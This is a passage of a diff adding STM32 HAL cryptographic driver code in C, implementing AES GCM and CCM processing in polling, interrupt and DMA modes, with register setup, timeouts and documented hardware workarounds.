/* Compute message total payload length */ + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + hcryp->SizesSum = hcryp->Size; /* Merely store payload length */ + } + } + else + { + hcryp->SizesSum = hcryp->Size; + } + + if (DoKeyIVConfig == 1U) + { + /* Reset CrypHeaderCount */ + hcryp->CrypHeaderCount = 0U; + + /****************************** Init phase **********************************/ + + CRYP_SET_PHASE(hcryp, CRYP_PHASE_INIT); + + /* Set the key */ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + +#if defined(CRYP) + + /* Set the initialization vector and the counter : Initial Counter Block (ICB)*/ + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IV1LR = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IV1RR = *(uint32_t *)(hcryp->Init.pInitVect + 3); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /*Wait for the CRYPEN bit to be cleared*/ + while ((hcryp->Instance->CR & CRYP_CR_CRYPEN) == CRYP_CR_CRYPEN) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + } + +#else /* AES */ + /* Workaround 1 : only AES. + Datatype configuration must be 32 bits during Init phase. Only, after Init, and before re + enabling the IP, datatype different from 32 bits can be configured.*/ + /* Select DATATYPE 32 */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_DATATYPE, CRYP_DATATYPE_32B); + + /* Set the initialization vector and the counter : Initial Counter Block (ICB)*/ + hcryp->Instance->IVR3 = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IVR2 = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IVR1 = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IVR0 = *(uint32_t *)(hcryp->Init.pInitVect + 3); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /* just wait for hash computation */ + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked & return error */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + +#endif /* End AES or CRYP */ + + /************************ Header phase *************************************/ + + if (CRYP_GCMCCM_SetHeaderPhase(hcryp, Timeout) != HAL_OK) + { + return HAL_ERROR; + } + + /*************************Payload phase ************************************/ + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + +#if defined(CRYP) + + /* Disable the CRYP peripheral */ + __HAL_CRYP_DISABLE(hcryp); + + /* Select payload phase once the header phase is performed */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_PAYLOAD); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + +#else /* AES */ + + /* Select payload phase once the header phase is performed */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_PAYLOAD); + +#endif /* End AES or CRYP */ + } /* if (DoKeyIVConfig == 1U) */ + + if ((hcryp->Size % 16U) != 0U) + { + /* recalculate wordsize */ + wordsize = ((wordsize / 4U) * 4U) ; + } + + /* Get tick */ + tickstart = HAL_GetTick(); + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + /* Write input data and get output Data */ + while ((hcryp->CrypInCount < wordsize) && (outcount < wordsize)) + { + /* Write plain data and get cipher data */ + CRYP_AES_ProcessData(hcryp, Timeout); + + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state & error code */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + } + + if ((hcryp->Size % 16U) != 0U) + { + /* Workaround 2 : CRYP1 & AES generates correct TAG for GCM mode only when input block size is multiple of + 128 bits. If lthe size of the last block of payload is inferior to 128 bits, when GCM encryption + is selected, then the TAG message will be wrong.*/ + CRYP_Workaround(hcryp, Timeout); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Encryption/Decryption process in AES GCM mode and prepare the authentication TAG in interrupt mode + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_AESGCM_Process_IT(CRYP_HandleTypeDef *hcryp) +{ + __IO uint32_t count = 0U; + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ +#if defined(AES) + uint32_t loopcounter; + uint32_t lastwordsize; + uint32_t npblb; +#endif /* AES */ + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + hcryp->SizesSum += hcryp->Size; /* Compute message total payload length */ + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + hcryp->SizesSum = hcryp->Size; /* Merely store payload length */ + } + } + else + { + hcryp->SizesSum = hcryp->Size; + } + + /* Configure Key, IV and process message (header and payload) */ + if (DoKeyIVConfig == 1U) + { + /* Reset CrypHeaderCount */ + hcryp->CrypHeaderCount = 0U; + + /******************************* Init phase *********************************/ + + CRYP_SET_PHASE(hcryp, CRYP_PHASE_INIT); + + /* Set the key */ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + +#if defined(CRYP) + /* Set the initialization vector and the counter : Initial Counter Block (ICB)*/ + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IV1LR = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IV1RR = *(uint32_t *)(hcryp->Init.pInitVect + 3); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /*Wait for the CRYPEN bit to be cleared*/ + count = CRYP_TIMEOUT_GCMCCMINITPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while ((hcryp->Instance->CR & CRYP_CR_CRYPEN) == CRYP_CR_CRYPEN); + +#else /* AES */ + + /* Workaround 1 : only AES + Datatype configuration must be 32 bits during INIT phase. Only, after INIT, and before re + enabling the IP, datatype different from 32 bits can be configured.*/ + /* Select DATATYPE 32 */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_DATATYPE, CRYP_DATATYPE_32B); + + /* Set the initialization vector and the counter : Initial Counter Block (ICB)*/ + hcryp->Instance->IVR3 = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IVR2 = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IVR1 = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IVR0 = *(uint32_t *)(hcryp->Init.pInitVect + 3); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /* just wait for hash computation */ + count = CRYP_TIMEOUT_GCMCCMINITPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + +#endif /* End AES or CRYP */ + + /***************************** Header phase *********************************/ + +#if defined(CRYP) + + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + /* Enable interrupts */ + __HAL_CRYP_ENABLE_IT(hcryp, CRYP_IT_INI); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + +#else /* AES */ + + /* Workaround 1: only AES , before re-enabling the IP, datatype can be configured*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_DATATYPE, hcryp->Init.DataType); + + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + /* Enable computation complete flag and error interrupts */ + __HAL_CRYP_ENABLE_IT(hcryp, CRYP_IT_CCFIE | CRYP_IT_ERRIE); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + if (hcryp->Init.HeaderSize == 0U) /*header phase is skipped*/ + { + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Select payload phase once the header phase is performed */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_GCMPH, CRYP_PHASE_PAYLOAD); + + /* Write the payload Input block in the IN FIFO */ + if (hcryp->Size == 0U) + { + /* Disable interrupts */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_CCFIE | CRYP_IT_ERRIE); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + } + else if (hcryp->Size >= 16U) + { + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + if (hcryp->CrypInCount == (hcryp->Size / 4U)) + { + /* Call Input transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Input complete callback*/ + hcryp->InCpltCallback(hcryp); +#else + /*Call legacy weak Input complete callback*/ + HAL_CRYP_InCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + } + else /* Size < 16Bytes : first block is the last block*/ + { + /* Workaround not implemented*/ + /* Size should be %4 otherwise Tag will be incorrectly generated for GCM Encryption: + Workaround is implemented in polling mode, so if last block of + payload <128bit don't use CRYP_Encrypt_IT otherwise TAG is incorrectly generated for GCM Encryption. */ + + /* Compute the number of padding bytes in last block of payload */ + npblb = 16U - (uint32_t)(hcryp->Size); + + /* Number of valid words (lastwordsize) in last block */ + if ((npblb % 4U) == 0U) + { + lastwordsize = (16U - npblb) / 4U; + } + else + { + lastwordsize = ((16U - npblb) / 4U) + 1U; + } + + /* last block optionally pad the data with zeros*/ + for (loopcounter = 0U; loopcounter < lastwordsize ; loopcounter++) + { + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + } + while (loopcounter < 4U) + { + /* pad the data with zeros to have a complete block */ + hcryp->Instance->DINR = 0x0U; + loopcounter++; + } + } + } + else if ((hcryp->Init.HeaderSize) < 4U) + { + for (loopcounter = 0U; loopcounter < hcryp->Init.HeaderSize ; loopcounter++) + { + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + } + while (loopcounter < 4U) + { + /* pad the data with zeros to have a complete block */ + hcryp->Instance->DINR = 0x0U; + loopcounter++; + } + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Select payload phase once the header phase is performed */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_PAYLOAD); + + /* Call Input transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Input complete callback*/ + hcryp->InCpltCallback(hcryp); +#else + /*Call legacy weak Input complete callback*/ + HAL_CRYP_InCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + else if ((hcryp->Init.HeaderSize) >= 4U) + { + /* Write the input block in the IN FIFO */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++; + } + else + { + /* Nothing to do */ + } + +#endif /* End AES or CRYP */ + } /* end of if (DoKeyIVConfig == 1U) */ + + /* Return function status */ + return HAL_OK; +} + + +/** + * @brief Encryption/Decryption process in AES GCM mode and prepare the authentication TAG using DMA + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_AESGCM_Process_DMA(CRYP_HandleTypeDef *hcryp) +{ + __IO uint32_t count = 0U; + uint32_t wordsize; + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + hcryp->SizesSum += hcryp->Size; /* Compute message total payload length */ + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + hcryp->SizesSum = hcryp->Size; /* Merely store payload length */ + } + } + else + { + hcryp->SizesSum = hcryp->Size; + } + + if (DoKeyIVConfig == 1U) + { + /* Reset CrypHeaderCount */ + hcryp->CrypHeaderCount = 0U; + + /*************************** Init phase ************************************/ + + CRYP_SET_PHASE(hcryp, CRYP_PHASE_INIT); + + /* Set the key */ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + +#if defined(CRYP) + /* Set the initialization vector and the counter : Initial Counter Block (ICB)*/ + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IV1LR = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IV1RR = *(uint32_t *)(hcryp->Init.pInitVect + 3); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /*Wait for the CRYPEN bit to be cleared*/ + count = CRYP_TIMEOUT_GCMCCMINITPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while ((hcryp->Instance->CR & CRYP_CR_CRYPEN) == CRYP_CR_CRYPEN); + +#else /* AES */ + + /*Workaround 1 : only AES + Datatype configuration must be 32 bits during Init phase. Only, after Init, and before re + enabling the IP, datatype different from 32 bits can be configured.*/ + /* Select DATATYPE 32 */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_DATATYPE, CRYP_DATATYPE_32B); + + /* Set the initialization vector and the counter : Initial Counter Block (ICB)*/ + hcryp->Instance->IVR3 = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IVR2 = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IVR1 = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IVR0 = *(uint32_t *)(hcryp->Init.pInitVect + 3); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /* just wait for hash computation */ + count = CRYP_TIMEOUT_GCMCCMINITPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + +#endif /* End AES or CRYP */ + + /************************ Header phase *************************************/ + + if (CRYP_GCMCCM_SetHeaderPhase_DMA(hcryp) != HAL_OK) + { + return HAL_ERROR; + } + + /************************ Payload phase ************************************/ + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + +#if defined(CRYP) + + /* Disable the CRYP peripheral */ + __HAL_CRYP_DISABLE(hcryp); + +#endif /* CRYP */ + + /* Select payload phase once the header phase is performed */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_PAYLOAD); + + } /* if (DoKeyIVConfig == 1U) */ + + if (hcryp->Size != 0U) + { + /* CRYP1 IP V < 2.2.1 Size should be %4 otherwise Tag will be incorrectly generated for GCM Encryption: + Workaround is implemented in polling mode, so if last block of + payload <128bit don't use DMA mode otherwise TAG is incorrectly generated . */ + /* Set the input and output addresses and start DMA transfer */ + if ((hcryp->Size % 16U) == 0U) + { + CRYP_SetDMAConfig(hcryp, (uint32_t)(hcryp->pCrypInBuffPtr), (hcryp->Size / 4U), (uint32_t)(hcryp->pCrypOutBuffPtr)); + } + else /*to compute last word<128bits, otherwise it will not be encrypted/decrypted */ + { + wordsize = (uint32_t)(hcryp->Size) + (16U - ((uint32_t)(hcryp->Size) % 16U)) ; + + /* Set the input and output addresses and start DMA transfer, pCrypOutBuffPtr size should be %4 */ + CRYP_SetDMAConfig(hcryp, (uint32_t)(hcryp->pCrypInBuffPtr), ((uint16_t)wordsize / 4U), + (uint32_t)(hcryp->pCrypOutBuffPtr)); + } + } + else + { + /* Process unLocked */ + __HAL_UNLOCK(hcryp); + + /* Change the CRYP state and phase */ + hcryp->State = HAL_CRYP_STATE_READY; + } + + /* Return function status */ + return HAL_OK; +} + + +/** + * @brief AES CCM encryption/decryption processing in polling mode + * for TinyAES IP, no encrypt/decrypt performed, only authentication preparation. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param Timeout: Timeout duration + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_AESCCM_Process(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + uint32_t tickstart; + uint32_t wordsize = (uint32_t)(hcryp->Size) / 4U; + uint16_t outcount; /* Temporary CrypOutCount Value */ + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ +#if defined(AES) + uint32_t loopcounter; + uint32_t npblb; + uint32_t lastwordsize; +#endif /* AES */ + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + hcryp->SizesSum += hcryp->Size; /* Compute message total payload length */ + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + hcryp->SizesSum = hcryp->Size; /* Merely store payload length */ + } + } + else + { + hcryp->SizesSum = hcryp->Size; + } + + if (DoKeyIVConfig == 1U) + { + + /* Reset CrypHeaderCount */ + hcryp->CrypHeaderCount = 0U; + +#if defined(CRYP) + + /********************** Init phase ******************************************/ + + CRYP_SET_PHASE(hcryp, CRYP_PHASE_INIT); + + /* Set the key */ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Set the initialization vector (IV) with CTR1 information */ + hcryp->Instance->IV0LR = (hcryp->Init.B0[0]) & CRYP_CCM_CTR1_0; + hcryp->Instance->IV0RR = hcryp->Init.B0[1]; + hcryp->Instance->IV1LR = hcryp->Init.B0[2]; + hcryp->Instance->IV1RR = (hcryp->Init.B0[3] & CRYP_CCM_CTR1_1) | CRYP_CCM_CTR1_2; + + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /*Write B0 packet into CRYP_DIN Register*/ + if (hcryp->Init.DataType == CRYP_DATATYPE_8B) + { + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0)); + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0 + 1)); + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0 + 2)); + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0 + 3)); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_16B) + { + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0), 16); + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0 + 1), 16); + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0 + 2), 16); + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0 + 3), 16); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_1B) + { + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0)); + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0 + 1)); + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0 + 2)); + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0 + 3)); + } + else + { + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0); + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0 + 1); + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0 + 2); + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0 + 3); + } + /* Get tick */ + tickstart = HAL_GetTick(); + + /*Wait for the CRYPEN bit to be cleared*/ + while ((hcryp->Instance->CR & CRYP_CR_CRYPEN) == CRYP_CR_CRYPEN) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + } +#else /* AES */ + /*AES2v1.1.1 : CCM authentication : no init phase, only header and final phase */ + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + /* configured encryption mode */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_ENCRYPT); + + /* Set the key */ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Set the initialization vector with zero values*/ + hcryp->Instance->IVR3 = 0U; + hcryp->Instance->IVR2 = 0U; + hcryp->Instance->IVR1 = 0U; + hcryp->Instance->IVR0 = 0U; + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /*Write the B0 packet into CRYP_DIN*/ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0); + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0 + 1); + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0 + 2); + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0 + 3); + + /* wait until the end of computation */ + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked & return error */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* From that point the whole message must be processed, first the Header then the payload. + First the Header block(B1) : associated data length expressed in bytes concatenated with Associated Data (A)*/ + + if (hcryp->Init.HeaderSize != 0U) + { + if ((hcryp->Init.HeaderSize % 4U) == 0U) + { + /* HeaderSize %4, no padding */ + for (loopcounter = 0U; (loopcounter < hcryp->Init.HeaderSize); loopcounter += 4U) + { + /* Write the Input block in the Data Input register */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + /* Clear CCF Flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } + } + else + { + /*Write Header block in the IN FIFO without last block */ + for (loopcounter = 0U; (loopcounter < ((hcryp->Init.HeaderSize) - (hcryp->Init.HeaderSize % 4U))); loopcounter += 4U) + { + /* Write the input block in the data input register */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + /* Clear CCF Flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } + /* Last block optionally pad the data with zeros*/ + for (loopcounter = 0U; (loopcounter < (hcryp->Init.HeaderSize % 4U)); loopcounter++) + { + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + } + while (loopcounter < 4U) + { + /* Pad the data with zeros to have a complete block */ + hcryp->Instance->DINR = 0x0U; + loopcounter++; + } + + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } + } + } /* if (DoKeyIVConfig == 1U) */ + /* Then the payload: cleartext payload (not the ciphertext payload). + Write input Data, no output Data to get */ + if (hcryp->Size != 0U) + { + if ((hcryp->Size % 16U) != 0U) + { + /* recalculate wordsize */ + wordsize = ((wordsize / 4U) * 4U) ; + } + + /* Get tick */ + tickstart = HAL_GetTick(); + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + while ((hcryp->CrypInCount < wordsize) && (outcount < wordsize)) + { + /* Write plain data and get cipher data */ + CRYP_AES_ProcessData(hcryp, Timeout); + + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + /* Check for the 